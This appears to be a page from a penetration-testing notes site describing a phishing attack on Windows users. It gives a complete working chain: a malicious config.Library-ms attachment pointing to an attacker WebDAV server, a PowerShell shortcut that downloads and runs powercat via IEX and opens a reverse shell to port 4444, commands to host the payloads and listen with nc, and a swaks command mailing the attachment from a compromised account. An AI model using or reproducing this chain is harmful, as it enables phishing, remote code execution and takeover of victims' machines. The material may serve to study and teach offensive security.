Phising

Create a malicious attachment (config.Library-ms) and include the attacker host's IP address within the <url> tags (line 15):

Create the attachment on a Windows host!

Library-ms is a Windows-specific file format, and it must follow a specific XML structure with Windows metadata.
If it is created it on Linux, even with the same contents, it might not be recognized or executed properly by Windows.

config.Library-ms

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://172.16.42.42</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Create a malicious PowerShell shortcut pointing first to an attacker-controlled HTTP server and then to an attacker-controlled listener:

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker_IP>:8000/powercat.ps1');powercat -c <attacker_IP> -p 4444 -e powershell"

Transfer both files to the attacking host under /webdav and start the server from within that directory:

# List the directory's contents 
$ ls
config.Library-ms  powershell.lnk

# Start the WEBDAV server
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=./ --auth=anonymous

Start the HTTP server and the listener:

# List the directory's contents 
$ ls
powercat.ps1

# Start the HTTP server
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# Start the listener
$ sudo nc -lnvp 4444

Send the phising email along with the malicious attachment:

# Send the phising email to jim
$ swaks --to target@example.com --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'

PreviousSocial Engineering NextCloud

Last updated 2 days ago

Was this helpful?

<?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://172.16.42.42</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>

# Send the phising email to jim $ swaks --to target@example.com --from compromized-email@example.com --header "Subject: Important!!!" --body @body.txt --attach @config.Library-ms --server 192.168.X.189 --auth LOGIN --auth-user compromized-email@example.com --auth-password 'Pass123!'